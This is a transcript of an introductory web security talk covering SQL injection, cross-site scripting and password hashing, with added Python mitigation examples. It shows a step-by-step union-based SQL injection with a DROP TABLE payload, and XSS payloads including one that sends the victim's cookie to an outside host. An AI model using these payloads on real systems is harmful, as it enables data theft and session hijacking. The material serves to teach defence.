
Introduction to Web Security

yeukhon
December 06, 2013


You can find the source code here https://github.com/yeukhon/websec-poc

I discuss cross-site scripting (XSS), SQL injection and password management in this talk.

This is my first time offering the talk, so there might be mistakes / confusions remaining to be addressed. Please send an email to [email protected] if you want to help correct them.


Transcript

  1. I am one of you. Undergraduate in CS. Took CSC 480 with Wes in spring. Mozilla Application Security intern in summer 2013.
  2. Security is hard: No shit. Developers are users too. We have the right to understand security and be aware of the state of the art.
  3. BIGGER PICTURE: “World's Biggest Data Breaches & Hacks visualization” - http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
  4. Risks of SQL Injection
     • Remains #1 in the OWASP Top 10.
     • Financial and trust loss:
       – Sensitive data leakage
       – DoS attack (usually in the form of data loss)
  5. How SQL injection works?
     GET /users?id=1
       SELECT * FROM users WHERE id = 1;
       ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),)
     GET /users?id=1 and 1=1
       SELECT * FROM users WHERE id = 1 and 1=1;
       ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),)
     GET /users?id=1 and 1=2
       SELECT * FROM users WHERE id = 1 and 1=2;
       None
     GET /users?id=1; DROP TABLE users;
       SELECT * FROM users WHERE id = 1; DROP TABLE users;
  6. Complex
     SELECT attr1, attr2 FROM users;
     SELECT * FROM ranks;
     SELECT percentage FROM progress;
     In principle, some of the attrs don't have to be visible to the frontend! attr1 may never be shown to us in the frontend.
  7. Basic usage of SQL Injections
     Attacker:
       1. /users?id=<id_num> is exploitable
       2. Wants to steal some sensitive data from some table (could be a different table or the same table).
     Tools:
       1. error-based attack, and
       2. union-based attack.
  8. UNION
     UNION combines two SQL queries into a single table of matching rows.
     table1:               table2:
       Name    Amount        Name    Amount
       Alice   100           Calvin  102
       Bob     101           Derek   103
     SELECT * FROM table1 UNION SELECT * FROM table2;
       Name    Amount
       Alice   100
       Bob     101
       Calvin  102
       Derek   103
  9. Step 1: Number of attributes
     The attacker has to find out the number of attributes returned by the SELECT <?> FROM <table>; query. The following tells us that more than one attribute is returned.
     GET /users?id=1 UNION ALL SELECT 1
       SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1;
       500 Internal Server Error:
       OperationalError: (1222, 'The used SELECT statements have a different number of columns')
  10. Step 1: Number of attributes
     Same probe with two columns; still more attributes are returned.
     GET /users?id=1 UNION ALL SELECT 1,2
       SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2;
       500 Internal Server Error:
       OperationalError: (1222, 'The used SELECT statements have a different number of columns')
  11. Step 1: Number of attributes
     In this case we know there are three attributes returned. That's good enough; the attacker doesn't need to know whether there are exactly three or more than three attributes in the table.
     GET /users?id=1 UNION ALL SELECT 1,2,3
       SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2,3;
       ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8')
  12. Step 2: Find a table to query
     The attacker also doesn't know what tables are available in the database. To find out, first determine the version. In this case, this is a MySQL 5.5.34 server.
     GET /users?id=1 UNION ALL SELECT @@version,2,3
       SELECT * FROM users WHERE id = 1 UNION ALL SELECT @@version,2,3;
       (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('5.5.34-0ubuntu0.12.04.1', '2', '3'))
  13. Step 2: Find a table to query
     For MySQL > 5, we can do this to find tables:
     GET /users?id=1 UNION SELECT 1, 2, table_name FROM information_schema.tables
       SELECT * FROM users WHERE id = 1 UNION SELECT 1, 2, table_name FROM information_schema.tables;
       ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),
        (1L, '2', 'CHARACTER_SETS'), (1L, '2', 'COLLATIONS'),
        (1L, '2', 'COLLATION_CHARACTER_SET_APPLICABILITY'),
        …..
        (1L, '2', 'setup_timers'), (1L, '2', 'threads'), (1L, '2', 'exercises'), (1L, '2', 'users'))
  14. Step 3: Find columns in a table
     We are targeting exercises; find all its columns.
     GET /users?id=1 UNION SELECT 1, 2, column_name FROM information_schema.columns
       SELECT * FROM users WHERE id = 1 UNION SELECT 1, 2, column_name FROM information_schema.columns;
       ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),
        (1L, '2', 'CHARACTER_SET_NAME'), (1L, '2', 'DEFAULT_COLLATE_NAME'),
        …..
        (1L, '2', 'exercise_name'), (1L, '2', 'exercises'))
  15. Step 3: Get exercises out
     We know there is a second table, exercises, and we know some interesting columns... Bonus: imagine the legitimate query never asks for the hash; we can use UNION to look for the hash :)
     GET /users?id=1 UNION SELECT exercise_name, null, null from exercises
       SELECT * FROM users WHERE id = 1 UNION SELECT exercise_name, null, null from exercises;
       (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('exercise_name_1', None, None))
  16. Mitigations
     • Sanitize user inputs. Escape.
     • Don't construct SQL queries by string concatenation.
     • If you somehow have to, use the parameterized query function provided by the database driver. This is usually known as a “prepared” statement.
     • Use an ORM. (Rails, Django ORM, SQLAlchemy are good.)
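The /users?id=<id_num> handler from the slides written both ways, as an added example (my own code, not from the talk or the websec-poc repository): the concatenating version accepts the slides' "and 1=2" and UNION payloads as SQL, the bound-parameter version sends them to the database as a plain value. It assumes an in-memory SQLite copy of the demo's users table; all function names are my own.

```python
import sqlite3

# Constructed in-memory copy of the users table shown on the slides.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'yeukhon', "
                 "'5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8')")
    conn.commit()
    return conn

DB = make_db()

def get_user_unsafe(conn, raw_id):
    # Vulnerable: the request parameter becomes part of the SQL text, so
    # "1 UNION ALL SELECT 1,2,3" is parsed as a second SELECT.
    return conn.execute("SELECT * FROM users WHERE id = " + raw_id).fetchall()

def get_user_param(conn, raw_id):
    # Prepared statement: "?" is a bound value. The driver never parses
    # raw_id as SQL, so the UNION payload is compared as a string against
    # id and matches nothing.
    return conn.execute("SELECT * FROM users WHERE id = ?", (raw_id,)).fetchall()

def get_user_safe(conn, raw_id):
    # Defence in depth: an id is an integer, so reject anything else before
    # it reaches the database (the handler should answer 400), then bind it.
    try:
        user_id = int(raw_id)
    except ValueError:
        return None
    return conn.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchall()

if __name__ == "__main__":
    print("unsafe:", get_user_unsafe(DB, "1 UNION ALL SELECT 1,2,3"))
    print("param: ", get_user_param(DB, "1 UNION ALL SELECT 1,2,3"))
    print("safe:  ", get_user_safe(DB, "1 UNION ALL SELECT 1,2,3"))
```

Returning the driver's error text, as the 500 responses on slides 9 and 10 do, is what made the column counting easy; catch database exceptions, log the detail server-side and send a generic error page.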
  17. XSS
     • XSS deals with scripting – to be exact Javascript, HTML and CSS.
     • I consider this the most common, the cheapest vulnerability.
       – Personal, school and corporate websites are almost always vulnerable.
  18. Risks of XSS
     • Loading malicious code.
     • Phishing attacks
       – Iframe attack
       – Clickjacking
     • Redirect attack
     • Cookie stealing
  19. Types of XSS
     • Reflected XSS – Injecting Javascript into a URL
     • Stored/Persistent XSS – Injected Javascript is loaded from the database
     • DOM-based XSS – Rewrite the DOM using either method from above
  20. Reflected XSS
     • The attacker injects some script (JS, HTML or CSS) and the input is reflected in the URL and in the document.
  21. HTML with Reflected XSS
     Input <h1> This is some h1 title </h1> into the search bar.
     GET /xss?search=%3Ch1%3EThis+is+some+h1+title%3C%2Fh1%3E
  22. Iframe with Reflected XSS
     We can create an iframe in the current document.
     GET /xss?search=<iframe src="http://192.168.33.60:8080" height="100%" width="30%"></iframe>
  23. Redirect with Reflected XSS
     On loading the document we can tell the DOM to jump to another website. The attacker can create a forged login page and make the victim think he or she is still on the legitimate login page.
     GET /xss?search=<script>document.location.href="http://google.com"</script>
  24. Cookie Stealing with Reflected XSS
     Under the browser's Same Origin Policy, we can make a GET request. The attacker makes a request to the attacker's URL in the background using XSS and appends the cookie to the request.
     GET /xss?search=<script>
       xhr=new XMLHttpRequest();
       xhr.open("GET","http://192.168.33.60:8081/?cookie=" + document.cookie,true);
       xhr.send();</script>
  25. Stored XSS
     Inject code into the database; the application doesn't escape the output, so the browser reads the code as it is (like valid HTML). This is much more serious – imagine someone posted a comment with XSS on a bulletin board.
  26. XSS Mitigations
     1. Sanitize input by means of escaping characters. For example, use JSON to serialize input and output.
     2. Cookies should be set with the Secure flag (HTTPS only) and the HttpOnly flag, so stealing cookies using XSS is not possible.
     3. Avoid running arbitrary user code in HTML. For example, don't turn off escaping with safe strings in Django templates.
     4. Add Content-Security-Policy, which prevents inline script and style.
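The /xss?search= handler from slides 21 to 24 hardened along the lines of the mitigation list, as an added example (my own code, not from the talk or the websec-poc repository): escape per output context, serialize data handed to script as JSON, and send the cookie flags and a Content-Security-Policy. Function names and the cookie name are my own.

```python
import html
import json

def render_search(search):
    # 1. Escape when writing user input into HTML. quote=True also turns
    #    " and ' into entities, so the value is safe inside an attribute
    #    (value="...") as well as in element text; the <h1>, <iframe> and
    #    <script> payloads from the slides are shown literally, not parsed.
    safe = html.escape(search, quote=True)
    return ('<form><input name="search" value="%s"></form>'
            '<p>Results for: %s</p>' % (safe, safe))

def render_search_json(search):
    # Handing the value to script: serialize as JSON and additionally escape
    # "<", so a "</script>" inside the data cannot close the script element.
    data = json.dumps({"search": search}).replace("<", "\\u003c")
    return '<script>var q = %s;</script>' % data

def security_headers(session_id):
    # 2. Secure: the cookie is only sent over HTTPS. HttpOnly: script cannot
    #    read it, so document.cookie on slide 24 is empty for this cookie.
    # 4. CSP: default-src 'self' without 'unsafe-inline' blocks injected
    #    inline <script> and <style>, and restricts frames (the slide 22
    #    iframe) to our own origin; frame-ancestors 'none' stops clickjacking.
    return {
        "Set-Cookie": "session=%s; Secure; HttpOnly; SameSite=Lax" % session_id,
        "Content-Security-Policy": ("default-src 'self'; object-src 'none'; "
                                    "frame-ancestors 'none'"),
    }

if __name__ == "__main__":
    print(render_search('<script>alert(1)</script>'))
    print(render_search_json('</script><script>alert(1)</script>'))
    print(security_headers("constructed-session-id"))
```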
  27. Hashing algorithms
     • Cryptographically strong hashing algorithms
     • Fast hashing vs work-factor hashing
     • MD5 – broken
     • SHA family (use SHA2)
     • Bcrypt vs scrypt vs PBKDF2
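Fast versus work-factor hashing on the page's own data, as an added example (my own code, not from the talk or the websec-poc repository): the unsalted SHA-1 digest stored in the demo's users table is recovered by a handful of comparisons, while the PBKDF2 variant uses a per-user salt, a tunable iteration count and a constant-time comparison. The candidate list is constructed for illustration and the function names are my own.

```python
import hashlib
import hmac
import os

# Digest stored for user 'yeukhon' in the slides' users table.
DEMO_HASH = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

def fast_hash_lookup(stored_hex, candidates):
    # Unsalted SHA-1 is fast and deterministic: every user who picked the
    # same password has the same digest, and a short list or a precomputed
    # table recovers it at the cost of one hash per candidate.
    for pw in candidates:
        if hashlib.sha1(pw.encode()).hexdigest() == stored_hex:
            return pw
    return None

# Work factor: raise until one hash costs on the order of 100 ms on the
# login server; production deployments use hundreds of thousands.
ITERATIONS = 200_000

def hash_password(password, iterations=ITERATIONS):
    salt = os.urandom(16)   # random per-user salt defeats shared tables
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Self-describing record so the work factor can be raised later.
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())

def verify_password(password, stored):
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    # Constant-time compare: no timing difference on the first wrong byte.
    return hmac.compare_digest(digest.hex(), digest_hex)

if __name__ == "__main__":
    print(fast_hash_lookup(DEMO_HASH, ["123456", "password", "letmein"]))
    record = hash_password("password")
    print(record, verify_password("password", record))
```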